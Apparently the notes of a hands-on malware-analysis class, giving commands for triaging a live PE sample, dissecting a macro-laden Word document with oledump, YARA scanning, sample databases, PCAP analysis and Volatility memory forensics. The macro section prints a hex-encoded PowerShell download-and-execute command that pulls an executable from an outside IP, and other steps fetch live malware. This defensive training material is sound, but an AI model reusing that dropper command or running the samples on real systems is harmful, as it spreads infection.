SHOW:
|
|
- or go back to the newest paste.
1 | ############################ | |
2 | # Download the Analysis VM # | |
3 | ############################ | |
4 | https://infosecaddictsfiles.blob.core.windows.net/vms/InfoSecAddictsVM.zip | |
5 | user: infosecaddicts | |
6 | pass: infosecaddicts | |
7 | ||
8 | ||
9 | ||
10 | ||
11 | - Log in to your Ubuntu system with the username 'malware' and the password 'malware'. | |
12 | ||
13 | - After logging please open a terminal window and type the following commands: | |
14 | ||
15 | cd Desktop/ | |
16 | ||
17 | ||
18 | - This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected': | |
19 | ||
20 | ||
21 | cd /home/infosecaddicts/Desktop/ | |
22 | wget https://infosecaddictsfiles.blob.core.windows.net/files/malware-password-is-infected.zip --no-check-certificate | |
23 | wget https://infosecaddictsfiles.blob.core.windows.net/files/analyse_malware.py --no-check-certificate | |
24 | ||
25 | unzip malware-password-is-infected.zip | |
26 | infected | |
27 | ||
28 | file malware.exe | |
29 | ||
30 | mv malware.exe malware.pdf | |
31 | ||
32 | file malware.pdf | |
33 | ||
34 | mv malware.pdf malware.exe | |
35 | ||
36 | hexdump -n 2 -C malware.exe | |
37 | ||
38 | ***What is '4d 5a' or 'MZ'*** | |
39 | Reference: | |
40 | http://www.garykessler.net/library/file_sigs.html | |
41 | ||
42 | ||
43 | objdump -x malware.exe | |
44 | ||
45 | strings malware.exe | |
46 | ||
47 | strings --all malware.exe | head -n 6 | |
48 | ||
49 | strings malware.exe | grep -i dll | |
50 | ||
51 | strings malware.exe | grep -i library | |
52 | ||
53 | strings malware.exe | grep -i reg | |
54 | ||
55 | strings malware.exe | grep -i hkey | |
56 | ||
57 | strings malware.exe | grep -i hku | |
58 | ||
59 | - We didn't see anything like HKLM, HKCU or other registry type stuff | |
60 | ||
61 | strings malware.exe | grep -i irc | |
62 | ||
63 | strings malware.exe | grep -i join | |
64 | ||
65 | strings malware.exe | grep -i admin | |
66 | ||
67 | strings malware.exe | grep -i list | |
68 | ||
69 | ||
70 | - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands | |
71 | ||
72 | sudo apt-get install -y python-pefile | |
73 | malware | |
74 | ||
75 | vi analyse_malware.py | |
76 | ||
77 | python analyse_malware.py malware.exe | |
78 | ||
79 | ||
80 | ||
81 | ||
82 | Building a Malware Scanner | |
83 | -------------------------- | |
84 | ||
85 | mkdir ~/Desktop/malwarescanner | |
86 | ||
87 | cd ~/Desktop/malwarescanner | |
88 | ||
89 | wget https://github.com/jonahbaron/malwarescanner/archive/master.zip | |
90 | ||
91 | unzip master.zip | |
92 | ||
93 | cd malwarescanner-master/ | |
94 | ||
95 | python scanner.py -h | |
96 | ||
97 | cat strings.txt | |
98 | ||
99 | cat hashes.txt | |
100 | ||
101 | mkdir ~/Desktop/malcode | |
102 | ||
103 | cp ~/Desktop/malware.exe ~/Desktop/malcode | |
104 | ||
105 | python scanner.py -H hashes.txt -D /home/infosecaddicts/Desktop/malcode/ strings.txt | |
106 | ||
107 | cd ~/Desktop/ | |
108 | ||
109 | ||
110 | ||
111 | ##################################################### | |
112 | # Analyzing Macro Embedded Malware # | |
113 | # Reference: # | |
114 | # https://jon.glass/analyzes-dridex-malware-p1/ # | |
115 | ##################################################### | |
116 | cp ~/Desktop/ | |
117 | ||
118 | - Create a FREE account on: | |
119 | https://malwr.com/account/signup/ | |
120 | ||
121 | - Grab the malware from: | |
122 | https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/ | |
123 | ||
124 | file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin | |
125 | ||
126 | cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin | |
127 | ||
128 | ||
129 | ||
130 | ||
131 | sudo pip install olefile | |
132 | malware | |
133 | ||
134 | mkdir ~/Desktop/oledump | |
135 | ||
136 | cd ~/Desktop/oledump | |
137 | ||
138 | wget http://didierstevens.com/files/software/oledump_V0_0_22.zip | |
139 | ||
140 | unzip oledump_V0_0_22.zip | |
141 | ||
142 | cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin . | |
143 | ||
144 | mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc | |
145 | ||
146 | ||
147 | ----------------------------------------------------------------------------------------------------------------------------------- | |
148 | ||
149 | ||
150 | ||
151 | sudo pip install olefile | |
152 | malware | |
153 | ||
154 | mkdir ~/Desktop/oledump | |
155 | ||
156 | cd ~/Desktop/oledump | |
157 | ||
158 | wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/064016.zip | |
159 | ||
160 | unzip 064016.zip | |
161 | infected | |
162 | ||
163 | python oledump.py 064016.doc | |
164 | ||
165 | python oledump.py 064016.doc -s A4 -v | |
166 | ||
167 | - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams. | |
168 | - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’. | |
169 | ||
170 | ||
171 | python oledump.py 064016.doc -s A5 -v | |
172 | ||
173 | - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners. | |
174 | ||
175 | ||
176 | python oledump.py 064016.doc -s A3 -v | |
177 | ||
178 | - Look for "GVhkjbjv" and you should see: | |
179 | ||
180 | 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B | |
181 | ||
182 | - Take that long blob that starts with 636D and finishes with 653B and paste it in: | |
183 | http://www.rapidtables.com/convert/number/hex-to-ascii.htm | |
184 | ||
185 | ||
186 | ||
187 | ||
188 | ############## | |
189 | # Yara Ninja # | |
190 | ############## | |
191 | sudo apt-get remove -y yara | |
192 | malware | |
193 | ||
194 | wget https://github.com/plusvic/yara/archive/v3.4.0.zip | |
195 | ||
196 | sudo apt-get -y install libtool | |
197 | malware | |
198 | ||
199 | unzip v3.4.0.zip | |
200 | ||
201 | cd yara-3.4.0 | |
202 | ||
203 | ./bootstrap.sh | |
204 | ||
205 | ./configure | |
206 | ||
207 | make | |
208 | ||
209 | sudo make install | |
210 | malware | |
211 | ||
212 | yara -v | |
213 | ||
214 | cd .. | |
215 | ||
216 | wget https://github.com/Yara-Rules/rules/archive/master.zip | |
217 | ||
218 | unzip master.zip | |
219 | ||
220 | cd ~/Desktop | |
221 | ||
222 | yara rules-master/packer.yar malcode/malware.exe | |
223 | ||
224 | ||
225 | Places to get more Yara rules: | |
226 | ------------------------------ | |
227 | https://malwareconfig.com/static/yaraRules/ | |
228 | https://github.com/kevthehermit/YaraRules | |
229 | https://github.com/VectraThreatLab/reyara | |
230 | ||
231 | ||
232 | ||
233 | Yara rule sorting script: | |
234 | ------------------------- | |
235 | https://github.com/mkayoh/yarasorter | |
236 | ||
237 | ||
238 | ||
239 | cd ~/Desktop/rules-master | |
240 | for i in $( ls *.yar --hide=master.yar ); do echo include \"$i\";done > master.yar | |
241 | cd ~/Desktop/ | |
242 | yara rules-master/master.yar malcode/malware.exe | |
243 | ||
244 | ||
245 | ||
246 | ||
247 | ||
248 | ||
249 | ||
250 | ||
251 | ||
252 | ||
253 | Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with: | |
254 | http://derekmorton.name/files/malware_12-14-12.sql.bz2 | |
255 | ||
256 | ||
257 | Malware Repositories: | |
258 | http://malshare.com/index.php | |
259 | http://www.malwareblacklist.com/ | |
260 | http://www.virusign.com/ | |
261 | http://virusshare.com/ | |
262 | http://www.tekdefense.com/downloads/malware-samples/ | |
263 | ||
264 | ||
265 | ||
266 | ||
267 | ############################### | |
268 | # Creating a Malware Database # | |
269 | ############################### | |
270 | ||
271 | Creating a malware database (sqlite) | |
272 | ------------------------------------ | |
273 | sudo apt-get install -y python-simplejson python-simplejson-dbg | |
274 | malware | |
275 | ||
276 | wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py | |
277 | wget wget https://infosecaddictsfiles.blob.core.windows.net/files/malware-password-is-infected.zip | |
278 | ||
279 | unzip malware-password-is-infected.zip | |
280 | infected | |
281 | ||
282 | python avsubmit.py --init | |
283 | ||
284 | python avsubmit.py -f malware.exe -e | |
285 | ||
286 | ||
287 | ||
288 | ||
289 | ||
290 | Creating a malware database (mysql) | |
291 | ----------------------------------- | |
292 | - Step 1: Installing MySQL database | |
293 | - Run the following command in the terminal: | |
294 | ||
295 | sudo apt-get install mysql-server | |
296 | malware | |
297 | ||
298 | - Step 2: Installing Python MySQLdb module | |
299 | - Run the following command in the terminal: | |
300 | ||
301 | sudo apt-get build-dep python-mysqldb | |
302 | malware | |
303 | ||
304 | sudo apt-get install python-mysqldb | |
305 | malware | |
306 | ||
307 | Step 3: Logging in | |
308 | Run the following command in the terminal: | |
309 | ||
310 | mysql -u root -p (set a password of 'malware') | |
311 | ||
312 | - Then create one database by running following command: | |
313 | ||
314 | create database malware; | |
315 | ||
316 | exit; | |
317 | ||
318 | wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py | |
319 | ||
320 | vi mal_to_db.py (fill in database connection information) | |
321 | ||
322 | python mal_to_db.py -i | |
323 | ||
324 | ------- check it to see if the files table was created ------ | |
325 | ||
326 | mysql -u root -p | |
327 | malware | |
328 | ||
329 | show databases; | |
330 | ||
331 | use malware; | |
332 | ||
333 | show tables; | |
334 | ||
335 | describe files; | |
336 | ||
337 | exit; | |
338 | ||
339 | --------------------------------- | |
340 | ||
341 | ||
342 | - Now add the malicious file to the DB | |
343 | ||
344 | python mal_to_db.py -f malware.exe -u | |
345 | ||
346 | ||
347 | ||
348 | - Now check to see if it is in the DB | |
349 | ||
350 | mysql -u root -p | |
351 | malware | |
352 | ||
353 | mysql> use malware; | |
354 | ||
355 | select id,md5,sha1,sha256,time FROM files; | |
356 | ||
357 | mysql> quit; | |
358 | ||
359 | ||
360 | ||
361 | ||
362 | ||
363 | ################# | |
364 | # PCAP Analysis # | |
365 | ################# | |
366 | cd /home/infosecaddicts/Desktop/Browser\ Forensics | |
367 | ||
368 | ls | grep pcap | |
369 | ||
370 | perl chaosreader.pl suspicious-time.pcap | |
371 | ||
372 | firefox index.html | |
373 | ||
374 | cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | |
375 | ||
376 | cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr | |
377 | ||
378 | sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs | |
379 | malware | |
380 | ||
381 | ||
382 | for i in session_00[0-9]*.www.html; do srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u | |
383 | ||
384 | ||
385 | ||
386 | ||
387 | ||
388 | ############################# | |
389 | # PCAP Analysis with tshark # | |
390 | ############################# | |
391 | tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u | |
392 | ||
393 | ||
394 | tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u | |
395 | ||
396 | ||
397 | tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?' | |
398 | ||
399 | ||
400 | tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq | |
401 | ||
402 | ||
403 | tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq | |
404 | ||
405 | tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq | |
406 | ||
407 | tshark -r suspicious-time.pcap -qz ip_hosts,tree | |
408 | ||
409 | tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq | |
410 | ||
411 | tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name" | |
412 | ||
413 | ||
414 | whois rapidshare.com.eyu32.ru | |
415 | ||
416 | whois sploitme.com.cn | |
417 | ||
418 | ||
419 | tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | |
420 | ||
421 | tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org' | |
422 | ||
423 | tshark -r suspicious-time.pcap -qz http_req,tree | |
424 | ||
425 | tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst | |
426 | ||
427 | tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g' | |
428 | ||
429 | ||
430 | ||
431 | ###################################### | |
432 | # PCAP Analysis with forensicPCAP.py # | |
433 | ###################################### | |
434 | cd ~/Desktop | |
435 | wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py | |
436 | ||
437 | sudo easy_install cmd2 | |
438 | malware | |
439 | ||
440 | python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap | |
441 | ||
442 | ForPCAP >>> help | |
443 | ||
444 | ||
445 | Prints stats about PCAP | |
446 | ForPCAP >>> stat | |
447 | ||
448 | ||
449 | Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command. | |
450 | ForPCAP >>> dns | |
451 | ||
452 | ForPCAP >>> show | |
453 | ||
454 | ||
455 | Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command. | |
456 | ForPCAP >>> dstports | |
457 | ||
458 | ForPCAP >>> show | |
459 | ||
460 | ||
461 | Prints the number of ip source and store them. | |
462 | ForPCAP >>> ipsrc | |
463 | ||
464 | ForPCAP >>> show | |
465 | ||
466 | ||
467 | Prints the number of web's requests and store them | |
468 | ForPCAP >>> web | |
469 | ||
470 | ForPCAP >>> show | |
471 | ||
472 | Prints the number of mail's requests and store them | |
473 | ForPCAP >>> mail | |
474 | ||
475 | ForPCAP >>> show | |
476 | ||
477 | ||
478 | ################### | |
479 | # Memory Analysis # | |
480 | ################### | |
481 | cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility | |
482 | ||
483 | python volatility | |
484 | python volatility pslist -f ../hn_forensics.vmem | |
485 | python volatility connscan2 -f ../hn_forensics.vmem | |
486 | python volatility memdmp -p 888 -f ../hn_forensics.vmem | |
487 | python volatility memdmp -p 1752 -f ../hn_forensics.vmem | |
488 | ***Takes a few min*** | |
489 | strings 1752.dmp | grep "^http://" | sort | uniq | |
490 | strings 1752.dmp | grep "Ahttps://" | uniq -u | |
491 | cd .. | |
492 | foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2 | |
493 | cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/ | |
494 | cat audit.txt | |
495 | cd pdf | |
496 | ls | |
497 | grep -i javascript *.pdf | |
498 | ||
499 | ||
500 | ||
501 | cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf | |
502 | wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip | |
503 | unzip pdf-parser_V0_6_4.zip | |
504 | python pdf-parser.py -s javascript --raw 00600328.pdf | |
505 | python pdf-parser.py --object 11 00600328.pdf | |
506 | python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js | |
507 | ||
508 | cat malicious.js | |
509 | ||
510 | ||
511 | *****Sorry - no time to cover javascript de-obfuscation today***** | |
512 | ||
513 | ||
514 | cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility/ | |
515 | python volatility files -f ../hn_forensics.vmem > files | |
516 | cat files | less | |
517 | python volatility malfind -f ../hn_forensics.vmem -d out | |
518 | ls out/ | |
519 | python volatility hivescan -f ../hn_forensics.vmem | |
520 | python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon | |
521 | for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done |